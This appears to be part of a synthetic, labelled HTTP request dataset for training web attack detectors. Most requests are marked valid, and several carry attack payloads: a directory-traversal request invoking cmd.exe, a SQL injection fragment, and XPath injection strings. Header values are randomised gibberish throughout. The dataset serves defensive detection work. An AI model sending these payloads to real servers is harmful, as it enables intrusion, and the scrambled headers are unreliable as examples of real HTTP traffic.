Range: 45370-03,2-266951,-79688
Referer: http://www.nats.uk/Wfeeoe/ntnzmf8.txt
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/9.6 (X11; U; Linux i586 1.0; dv-no; rv:8.8.7) Gecko/52090717
UA-CPU: x86
UA-Disp: 9274,388,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8501x1867
Via: tra/1.5 141.162.17.48
Transfer-Encoding: deflate
Upgrade: esgn/6.8, ei1l/5.1, redat/5.0, 10g/8.4
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 558161197485765584
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rbt6Afasrscn=621739&2farh=rconnecthopt fec+/uNgn Fea h&pen0famlaei=tI7xRu&nsbperluQ6n.TK1=rNiX3&5Nekbeo=09940

End - Id: 4335
Start - Id: 36466
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 101.204.174.254
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.8, identity, deflate, deflate;q=0.8, deflate
Accept-Language: 8negrsat-de0shs;q=0.8, Taerioit-sCrfamn;q=0.9, metJc-rS
Cache-Control: 6nutohas='i1gxrc'
Client-ip: 52.92.115.192
Cookie: vya=s-;raheemotsrd=36;cr=04096358;1Soj1tmpdA3P8=el;Azsroati=sp7i;qi=yoemc
Cookie2: $Version="4"
Date: Sat, 22 Nov 08 07:33:04 UTC
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Sat, 09 Jul 05 18:00:32 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jul 05 06:34:10 GMT
Max-Forwards: 266
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Digest response="6bcfaCb42a9eCF8FdFe9b93a3aBFdcb8"
Range: 57-,410056-,436232-1281
Referer: /efotCf0/yohhm0h/rn2An4/bmren.wmn
TE: trailers,gzip
Trailer: Accept
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 8.4; mo-tt; rv:7.9.4) Gecko/62497536
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 3.4 www.eikhso.png
Transfer-Encoding: gzip
Upgrade: fet/9.1, iro/2.9
Warning: 011 www.qtp2.jpeg "qrH18z" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 36466
Start - Id: 15161
class: Valid
GET /ipjedeai/irs.LE7rl@su_/ofAVcb1E/p@dzmsIZ.tiff? HTTP/1.0
Host: www.icHa5bq.it
Connection: close
Accept: image/gif;q=0.7, image/png;q=0.1, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=1
Client-ip: 234.176.105.96
Cookie: nasIlOauo4=>An9fdog$httpsrt;ahxlwtkeess=6196;kohglq=97;eEoedcfpte3sno=e9F8qe.ED
Cookie2: $Version="90"
Date: Tue, 16 Feb 10 14:01:38 UTC
ETag: W/"jszr3Jt_xj595S@w"
Expect: thc8
From: 7stnsn@lhythtbTtd.it
If-Modified-Since: Sun, 18 Dec 05 09:46:06 GMT
If-Unmodified-Since: Mon, 03 Jul 06 16:10:10 UTC
If-Match: *
If-None-Match: "eGFlmiT4IFccUscd"
If-Range: Thu, 17 Sep 09 19:22:14 GMT
Max-Forwards: 2716
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic enB6ZHQ2bUg6ZHpjNnE=
Authorization: Digest nonce
Range: -96,366774-,-767
Referer: /24hra/eooxm/hi27ota.swf
TE: deflate
Trailer: If-None-Match
User-Agent: Mozilla/3.4 (X11; U; Open BSD i586 2.4; wa-hs; rv:9.9.0) Gecko/74908667
UA-CPU: Sparc
UA-Disp: 1668,172,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1372x650
Via: 0.8 www.miOl.png, 5.7 www.itleg6.gif
Transfer-Encoding: compress
Upgrade: yaDE/3.2, tcnfS/4.6, ertla/5.3, dLabi/2.9, sji6A/7.7
Warning: 615 120.85.45.38 "inrt" 
X-Forwarded-For: 155.89.71.222
X-Serial-Number: 54307917779872
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15161
Start - Id: 15500
class: Valid
GET /d3GuSQxQ@oO/rY.y7svx/ihso7aoO6iscaoh/Hnrete/rte7nwtOteedreutjom/FcJq@TMPSTMxW/mTc816I8.tiff?aa=i6lnc6oz1r5&itm1wki=vetelnetd&jhdistyaei1m=8985&6tsatnulaivtLhl=nwih%3E+cmdmailbdfdeyo&hgssN=l-x0YKuuK&etsnfo=eudod9ylsgroreye&HptbCSeiIila=e-0NM65&muyoeAemhhne=22451529&4O.aIegD5r=%40%3Bnullc&2RVfHerh=7956787&eoiHeeisTgwx=d803&5--T=eShpnigra%40rig&oe3=704 HTTP/1.1
Host: 120.211.159.25
Connection: keep-alive
Accept: image/gif;q=0.0, application/*, application/x-tar
Accept-Charset: x-mac-arabic, us-ascii
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 74.25.27.27
Cookie: eeendeeiwhadshu=Seu;6ydiIsfdsBoiene=d6k;qui=s|sl;aiidturjteeRetf=iy-@le-VkI;vfg=106374
Cookie2: $Version="725"
Date: Mon, 05 Apr 04 16:21:16 CET
ETag: "_3v6VtLlDAdHJIDC4Jn"
Expect: 100-continue
From: oJs6@aoganier.cz
If-Modified-Since: Tue, 14 Apr 09 24:49:20 GMT
If-Unmodified-Since: Wed, 15 Jul 09 10:36:45 GMT
If-Match: "QbBD5YnbbMJlO4ZG22"
If-None-Match: *
If-Range: Tue, 30 Mar 10 12:43:01 GMT
Max-Forwards: 158
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: drol nltaoan=u5pe
Authorization: Digest opaque="setlgree"
Range: -613967
Referer: http://www.oafhvhs.org/ea0eu/leolE/stga0n/btssisH.jsp
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/8.9 (compatible; MSIE 9.8; SunOS sun4u; IoeAg7iar)
UA-CPU: Sparc
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1725x7516
Via: 0.3 www.eshgbE.png, FTP/6.8 161.150.214.171
Transfer-Encoding: blee97; eChirm=srhmhut
Upgrade: aeua/3.9, hNtay/3.8, Hhte/8.2
Warning: 718 www.80zvotre.png "la57regea" 
X-Forwarded-For: 143.27.31.69
X-Serial-Number: 50575175012766315162
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15500
Start - Id: 19584
class: Valid
GET /7bFo-Zlog00.E5ahusr/aCXAGT1JOU-USK@7@/2saitDiazoeSoens/5ccs647Q4wWO/5@8r/mkI7Y-.php3?m7sta23easw=aZRt2Sr6YQ&nyrlt4aye=dr&osstrz=chmopennivet+mme4&ioia6ms=4A&dEti=fHois&ehistusnb=1csphp&sbemt=sh0esawvueetoah&acceptni9C3P=a+b&oWzin=70886864&ll5o1aeagn=46058233&6WURqOz_5De=2257790 HTTP/1.1
Host: www.Ceketyh.it
Connection: go169sib
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: ihe1l-htycn;q=0.2, ieosrnp-ne, wd-Peintt;q=0.6, sisd7-e, X5-t;q=0.9
Cache-Control: oLLg6o1m=dgG
Client-ip: 102.37.110.36
Cookie: alEdk0S=59238353;tstNoHu=aad8sm
Cookie2: $Version="52"
Date: Mon, 06 Sep 04 01:52:24 UTC
ETag: W/"SXup_SmNwWOnFcvZiBQ"
Expect: h5Eio
From: hcAa@ot1oomNS.fr
If-Modified-Since: Tue, 21 Jul 09 22:46:02 UTC
If-Unmodified-Since: Wed, 22 Jun 05 09:36:26 GMT
If-Match: "wXlAWpRT.QaU4zC4"
If-None-Match: "_kVCsAqGXZFMnjCO"
If-Range: "GpWMSRxH3g8.rv9B0-"
Max-Forwards: 816
MIME-Version: 1.0
Pragma: eziuIl='g1s'
Proxy-Authorization: Digest response="26f0Ddd9c3EF6aBbfeE8e5AF980aDe9d"
Authorization: Digest uri=http://aoieILi.de/weroiio/635zm1/zyiennMt/neiorfce.pl
Range: 6483-,038501-
Referer: http://www.eIxr.ch/2W0r/7ee5ri.swf
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 2.3; 08-ii; rv:6.2.8) Gecko/47869298
UA-CPU: PowerPC
UA-Disp: 187,0883,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4605x2042
Via: 8.4 www.eneAo.jpeg:147, HTTP/9.1 www.mtDoe0.png
Transfer-Encoding: gzip
Upgrade: hsnano/3.1, tta/8.2, onnrgo/0.0, tutde/7.7, itn/8.0
Warning: 408 115.192.90.4 "lvsu" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19584
Start - Id: 28894
class: Valid
GET /1LbR4_DT9xVr/zTlte1ava9usno2/ej/rletyQ0eiu9t/0n1tvnVncIYstyle90/xkQqkaUiU.PY.tiff?d3_2E9FYA=rfn5Harczn9sotsu&dlemttiPrniY=6801443&mstrieq=214&otkd=111711 HTTP/1.0
Host: www.i8wh.ch
Connection: rh2i9r
Accept: video/quicktime, application/x-tar, image/gif;q=0.6
Accept-Charset: x-mac-turkish;q=0.3
Accept-Encoding: 
Accept-Language: raey-rite;q=0.0, 0e-ohpt;q=0.4, iah-qe2nottg;q=0.1, dieo2ucl-dcnnI5mt;q=0.0, ergdsei-K;q=0.5
Cache-Control: min-fresh=967
Client-ip: 28.194.250.228
Cookie: u83usrtr=593924;8t=92;irl=n:avS ;hzeAl=hgieiW;connectWQ5c.l9KwNw=Astding;0iunriocx7=h
Cookie2: $Version="3"
Date: Sat, 30 Jun 07 21:24:04 CET
ETag: "2DjujeEkOAeoLe7@"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Thu, 21 Jul 05 04:17:03 GMT
If-Unmodified-Since: Mon, 19 Apr 04 08:28:36 CET
If-Match: "GWBg8L7Rru6E9VbUlOnb"
If-None-Match: "dgWJ8McAp0y4mx0"
If-Range: Thu, 19 Aug 04 15:46:51 UTC
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: STsh gaeltfy=aI5t
Range: 8-,63-0,365419-
Referer: /hbmetrO.html
TE: deflate,chunked,chunked;q=0.7
Trailer: If-None-Match
User-Agent: emTwjhP http://www.soam2a.net
UA-CPU: MIPS
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: oexf/6.2 www.n0in.css, FTP/7.1 www.w9Lmt.css, 9.1 139.212.221.99
Transfer-Encoding: identity
Upgrade: piNnt/7.4
Warning: 104 www.oaChe2ao.css "si2kaalcoktaehr" "Sun, 05 Aug 07 09:32:59 GMT"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 926912300576004465
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28894
Start - Id: 1098
class: Valid
GET /endyrOyozoelonoiiria/qyofudITrnnbu7tueop/iYogF0QvZpFWPlcCZeK/cXzRbPR4bU/ntrqwlg4rtgilathngf.php3?esy5satastnl3w=c8wARYmKYP&eddiaqf9=hYFd&orM1uGsampdj=fZtsis&OterIrllg9eaani=1&nhixino59qep5e=jT7nL HTTP/1.0
Host: 212.100.200.172
Connection: keep-alive
Accept: text/html;q=0.1, application/zip;q=0.3, video/mpeg;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: compress, gzip, identity
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 44.94.35.250
Cookie: npeivMLsy=i7D5h2vJ@Q-;3cfrapzly=rso4c9uepWr9eTd;qeBj2dDYA8e2=425525602;qwe=r.HebIV152be
Cookie2: $Version="356"
Date: Wed, 28 Dec 05 05:44:57 CET
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: i7nbBch=r4rzda;rqwr=tMmjzte
From: hsrtboi@onni.cz
If-Modified-Since: Thu, 04 Sep 08 15:03:38 UTC
If-Unmodified-Since: Sat, 28 Nov 09 01:44:38 CET
If-Match: "egqQiKLL5YTL7@9"
If-None-Match: "PUiYIAh21XN6Xs8Tqd"
If-Range: *
Max-Forwards: 0011
MIME-Version: 9.9
Pragma: ohc='maepelof'
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Digest cnonce="gehETepa"
Range: 634551-,48052-6687,-9
Referer: /ase7hum/Naghz/srGequ/u0esm.dll
TE: trailers,chunked;q=0.8,chunked;q=0.8
Trailer: If-Modified-Since
User-Agent: tluhuEFss
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8837x3320
Via: HTTP/5.9 www.tofed.shtml, FTP/3.8 www.t3Eeti.html
Transfer-Encoding: i9la3; nkoj=lsosdp
Upgrade: naoiE7/1.4, Zee1m6/8.6, 40Hci1/1.3, 6iCotl/8.9
Warning: 887 www.ehmEnb04.htm:93 "h3gfakch" 
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1098
Start - Id: 26067
class: Valid
GET /sZ6NOsWDkw/tkrLV/uia2b/p97/e3epes/Wt3LM-Ss/n3lElh/ExR7ZNWCevalII/im/U@UYhf/tq.xvP/sadidlhr9ri.jpg?htweor0d=sb&mA=9060&nh2tduakFa=25772&hoiTsLcnel59s=gexeco-&soif=80&hH=istmpatbmzi&hrnvtpetoeaN=4945750&pTnattn=5420695&e7eSegA=0&gioUlorlempRl6=4746&ViwPiframe8=o%7Cm6xterm&aes6xe=6&2cpcueo=2812&itxr=ea%5D6n3oho HTTP/1.0
Host: 47.25.58.107
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-1;q=0.8, windows-1251
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=95
Client-ip: 23.160.70.27
Cookie: ialdbeopne=j3;Stro=tinremailshtpassacc;amsRhstyleL=iXdogB;yfsbyiocminm=j6at;beweeni=ejF0fnQNiy7l;tlqaa5=396
Cookie2: $Version="6"
Date: Sat, 13 Aug 05 06:42:59 UTC
ETag: W/"lc.HWafmi@6sQmMRq"
Expect: Emueor
From: alLeiF@uTy8difar.biz
If-Modified-Since: Sat, 04 Apr 09 08:06:51 GMT
If-Unmodified-Since: Fri, 21 Jul 06 01:12:27 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Jul 08 14:48:45 GMT
Max-Forwards: 809
MIME-Version: 9.3
Pragma: aiKaennr='gid'
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: Digest uri=http://www.miiii.net/eohjnhl/rtr4/i0qsrnsq/nolrnaj/ynca5AK.php4
Range: 95211-0126
Referer: http://www.7hiyear.st/yosY/fErtaLal.swf
TE: trailers,gzip;q=0.1
Trailer: Proxy-Authorization
User-Agent: izos (o-QmH0N; c7Z5NPzr; miEyQGVn)
UA-CPU: StrongARM
UA-Disp: 889,8239,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 096x0326
Via: 9.9 63.138.225.92, FTP/6.0 13.145.246.197
Transfer-Encoding: compress
Upgrade: adreto/0.5, erstt/5.5, 1elbre/0.6
Warning: 849 www.lsim.tiff:35662 "ifqLts" "Mon, 09 Jan 06 16:39:11 CET"
X-Forwarded-For: 72.230.129.152
X-Serial-Number: 39635409831917
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 26067
Start - Id: 35376
class: SqlInjection
GET /ntL1yolntnrdor/8rlocationSreplaceDnc4-FJ/caandf.php?1wgetqhNVUx=ievasht&arioo7thboHglt0=%27+AND+USER_NAME%28%29%3D%27qrdos&dn9Tunsbnrebuf=49&nhzantpe=4betiansisaMZ6O&mtNncorin=aeO HTTP/1.1
Host: www.Xpbnei.net
Connection: close
Accept: text/plain, text/html
Accept-Charset: x-mac-roman, iso-10646-ucs-2, windows-1251
Accept-Encoding: *
Accept-Language: hyaine-iogu8ide, rmCyyIdt-gNB
Cache-Control: no-transform
Client-ip: 246.233.58.195
Cookie: PsystemMpJZ=7339;Rsol=4180
Cookie2: $Version="2"
Date: Sat, 20 Jan 07 10:15:40 GMT
ETag: "2VtXGzIMP09lZu9Q"
Expect: eeosm=3uereXt
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VK6tZFF1ZfIx56bA3e7W"
If-None-Match: *
If-Range: *
Max-Forwards: 6985
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: Basic Z3NydnU6a2VseW0=
Authorization: NTLM bm9VMzFwc0ltcWVhVWVIaG0wZ3N0QXN0ZWFudHU5ZTR0ZWJDb2dyU09pa3RyM2M=
Range: 187-
Referer: http://tsn0.ch/rN4hinyl/Fnhn9ol/e08tu/aurF71/wenu.wav
TE: deflate;q=0.9,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: epCdfaat0sdItltw
UA-OS: Windows 95
UA-Pixels: 1597x768
Via: 3.7 33.213.144.25, FTP/0.0 235.54.172.154:9246
Transfer-Encoding: compress
Warning: 961 www.Nezio.shtml "yirNnnptNp5er5wpa6a" "Sun, 10 Jul 05 04:38:42 GMT"
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35376
Start - Id: 33219
class: Valid
PUT /maechomDlsa5QMallj/lxL3K7Teo/PTafg/a-QryGITxryIu@6aCm9/ruroyLOstostaIa/arLdxEl5LNjh5u8m8jA/9NCG43/tK/eettma0soj.msf? HTTP/1.1
Content-Length: 115
Content-Language: eme
Content-Encoding: deflate
Content-Location: http://www.sat0mb.it/uh8e/crGeX1.php3
Content-MD5: THJoZmMza3JtT2N0c3RjaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Dec 05 14:29:07 UTC
Last-Modified: Wed, 14 Jan 09 21:01:33 GMT
Host: www.taNseais.be
Connection: close
Accept: */*
Accept-Charset: cp-950;q=0.3, iso-8859-8
Accept-Encoding: *
Accept-Language: stbzem-oAej, 0ewlRn-H, eNh2oia-ocan;q=0.4, dw-eo
Cache-Control: max-age=208
Client-ip: 41.36.124.70
Cookie: oeexyehil=b;IVhavingpv=7;oin=24735;o5=eth;uoweat=e 
Cookie2: $Version="2"
Date: Fri, 21 Nov 08 02:55:46 UTC
ETag: W/"qD0FkdLA0A@1KHH4"
Expect: 100-continue
From: aenere@diek5iacf.it
If-Modified-Since: Sat, 05 Apr 08 15:03:47 CET
If-Unmodified-Since: Sat, 18 Apr 09 09:43:48 UTC
If-Match: "JxOWUBJQR9Jlt@9.ucd"
If-None-Match: "-Qvv97SuQ7R@GsBji0"
If-Range: Thu, 22 May 08 20:49:57 UTC
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: s2weid eddheoea=tmaa
Authorization: Basic aXBzdG9xb2k6Z2Q1aA==
Range: -352533,78-491
Referer: /elDhihve/arNd6gt/arcalOo.exe
TE: deflate,deflate,deflate;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (Windows; U; WinNT 2.3; ib-yi; rv:4.5.8) Gecko/45068386
UA-CPU: MIPS
UA-Disp: 776,0303,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 334x7223
Via: FTP/8.1 www.gjxitS.htm, 4.1 www.isit1iew.jpeg:6, 3.0 www.sfaYso6.tiff
Transfer-Encoding: gzip
Upgrade: kuu/2.5, oth/3.8, 2es/8.1
Warning: 136 163.36.250.216 "merp" "Sun, 19 Nov 06 07:32:24 CET"
X-Forwarded-For: 83.167.179.226
X-Serial-Number: 979942
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nsie=m&maapsy=en&Md=705335&cy=@$&utq=599&etesoDaesltfxet=712793352&uRTaheinnrce=aknkdeesmccne&e24ip7de=24606525

End - Id: 33219
Start - Id: 31385
class: Valid
GET /tEexecz3Uoptlsystemopen-8D/ieYr6oD2sb0G0.js?q8iE5XxQimgSz=oTa3u&alcexh7cYnu=451&ileD2nkssivr=j%270&yv0v9=etctes&scriptQjBMdopenO3IPK=80230201&pn5=6&samgQcopy1=h3 HTTP/1.0
Host: www.eamse.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: eyb-ay
Cache-Control: no-store
Client-ip: 248.191.216.133
Cookie: connectboot.iniWY8scriptRvX=in u|iodhee&'as;Ea;hioastsaHfEhese=bLmFvotestwellax;sijeIrr=a3rme;0eutqmpeiraeirA=lmnfltsnxee
Cookie2: $Version="970"
Date: Fri, 27 Apr 07 20:49:22 CET
ETag: W/"ogu5MqMSWXfdu5Wk"
Expect: ddos3
From: Tzeuatea@eoges.de
If-Modified-Since: Thu, 30 Nov 06 08:41:54 GMT
If-Unmodified-Since: Wed, 12 Sep 07 08:23:37 UTC
If-Match: *
If-None-Match: "Radlqp-1Z7cOuNicAOFJ"
If-Range: Tue, 18 May 04 24:54:59 UTC
Max-Forwards: 75
MIME-Version: 4.6
Pragma: wItlnfi=oedwlncj
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: Basic ZWdoZWNBaDphaW5ucmplOQ==
Range: 214-,6423-,-75701
Referer: /tGrue/usqdhAt0/trec8/ttnblthl.css
TE: gzip,deflate;q=0.1
Trailer: Pragma
User-Agent: Mozilla/5.7 (X11; U; Open BSD i586 6.4; ur-ph; rv:7.9.8) Gecko/09059133
UA-CPU: Sparc
UA-Disp: 6015,3763,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2355x254
Via: lpm/6.3 209.147.56.23:1
Transfer-Encoding: beib; ruis=czhrLit
Upgrade: ruexiD/5.5
Warning: 398 226.241.76.108 "setlnsfmby7bt1eaniq" "Fri, 18 Aug 06 14:43:39 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 33047995554498
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31385
Start - Id: 49814
class: XPathInjection
GET /UctEtz1iaistttpNao/aUnNYTqOZpWSiY/yay/_R/u7oErqia/b7/o_jq0tio/97Hu2/deesuap/PIpsQWWScBnth0X/tnfiloogrttixEegeoz/tonsthDen.exe?oaefri=46318++++or+1%3C+++dcNc%2Finrlt%2Fesdnn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D491%5D++++or+01%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&aTleplfn=toH-gv0&processing-instruction9xJ=te7aeag+%3A HTTP/1.1
Host: 248.192.228.245:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.6, us-ascii, big5
Accept-Encoding: 
Accept-Language: dre-Ue, eeoio-ncwhcK8s, Uogott-is;q=0.8, pejtT-ere
Cache-Control: no-store
Client-ip: 248.234.57.173
Cookie: ubgsoundNt_0qhZ=151;lreecneahtE=n7ld<;u1eag3h=133888;-CDk3=10;hefru=s9crdhEs-tlsunion
Cookie2: $Version="04"
Date: Thu, 25 Dec 08 14:32:44 GMT
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Wed, 15 Aug 07 18:52:48 CET
If-Unmodified-Since: Mon, 18 Feb 08 01:29:37 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 03:20:11 GMT
Max-Forwards: 281
MIME-Version: 7.3
Pragma: es=nEg6ln
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: hbE9e eiza=ioIeete
Range: -786962,-08955,08-
Referer: /Dkos/xtool1.zip
TE: gzip;q=0.4,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 6.1; mi-ez; rv:3.5.2) Gecko/55744842
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: 4.4 234.87.5.77:8664, 0.2 39.228.80.180, 0.8 116.94.125.101
Transfer-Encoding: identity
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 144.56.170.95
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49814
Start - Id: 8573
class: Valid
GET /mllou/txwUpm8Q8S/.Ye8Zhavinganph-6/Y7/btbat/snf6t/.D8autoexecscript-y_6HAdnAG/szVt1gLzT/AtklPxterm8dWx.gif?8nyetad=ttTid&in0cQtaslcitr=wndfd%28kqrnetelneth+cgtPif&nteuezst=rjewherem+%7Cy1r&segEkaenndayb=s4WTn2&qtort=11&p3do=7&lm=teyrsttefE&fOJsystemYadmin=stute8edt1c&ho=nd4nr&ambAeCnasoydec=sdE&eeh9n=1130378988&wdidhnnwe7ens8=diWCnlbh6uabaeeSo&onrd=t9Eisn%3Din HTTP/1.1
Host: www.cachhgt.gov
Connection: keep-alive
Accept: application/zip, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 4alt-tenivi;q=0.2
Cache-Control: no-cache
Client-ip: 184.148.73.237
Cookie: shve=965008;Laccess_logwindow.openfUnAbin5='wbexnhcomwDhnqb//l;Tff9.po-=arif;bobc3NeEeyoE=neanyeu8Efzy;htyss=tr8sy4hr
Cookie2: $Version="69"
Date: Fri, 26 Jan 07 20:43:27 GMT
ETag: "P4WYADtMW6vHRUh"
Expect: 100-continue
From: 7tult@ty9u7Ower.com
If-Modified-Since: Sat, 31 Dec 05 19:38:44 CET
If-Unmodified-Since: Mon, 15 Aug 05 20:23:43 GMT
If-Match: *
If-None-Match: "y4b0IIE7iepn55.MEA"
If-Range: *
Max-Forwards: 912
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest qop=8dbndemk
Authorization: NTLM ZnNzY2VvcnRvYW5yYWFuZXBuQWxjRTZlZXNuaTRuY09zeA==
Range: -281,776-17139
Referer: http://www.sacAPTgE.biz/batM.conf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.9 (compatible; MSIE 6.3; Unix; h1qfew; uduzltEm)
UA-CPU: Sparc
UA-Disp: 5974,9277,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 783x6311
Via: FTP/8.2 www.BD4W.js
Transfer-Encoding: gzip
Upgrade: r85mm/0.1
Warning: 409 www.ahU7m.jpg:842 "orneer" "Mon, 08 Jun 09 13:03:12 GMT"
X-Forwarded-For: 154.87.255.117
X-Serial-Number: 1101244
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8573
Start - Id: 48930
class: XPathInjection
GET /usd4pttN.jpeg?w3n9Dthat3dte=83431&evl=rdeletesl&dd1DlZJSoHPx=nM3jC8NJrFUl&wgetGQ2F=836051&stmysebona=558547&5EY.qbePrcp=t2actum&agJ6bad1ie=s2%27+or+count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++i%2B++j+++%2B++++k+%2B+++l%2B+++1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++++%27ez9rm%27++++%3D+%27+necu%27+++or HTTP/1.1
Host: www.adtmed.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-tw, cp-950;q=0.8, cp-932;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=787
Client-ip: 174.124.242.131
Cookie: pl6XEtTZphp=TA;ad2Aaq=1611
Cookie2: $Version="7"
Date: Mon, 17 May 04 18:28:40 UTC
ETag: "10JPxibSyM8@OLZ6-kC"
Expect: eolcviD
From: lsc81e@NyZx1plgr7.de
If-Modified-Since: Tue, 29 Jun 04 18:00:09 CET
If-Unmodified-Since: Fri, 27 Aug 04 17:59:05 CET
If-Match: *
If-None-Match: *
If-Range: "2LqXz-6PTMdWUtFd2M"
Max-Forwards: 08
MIME-Version: 1.4
Pragma: plii6yd='f'
Proxy-Authorization: Digest cnonce="dsde"
Authorization: Digest opaque="wasllza"
Range: 326-470558,-0121
Referer: /hnaast.sh
TE: gzip,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 2.1; en-jl; rv:1.8.9) Gecko/29679934
UA-CPU: StrongARM
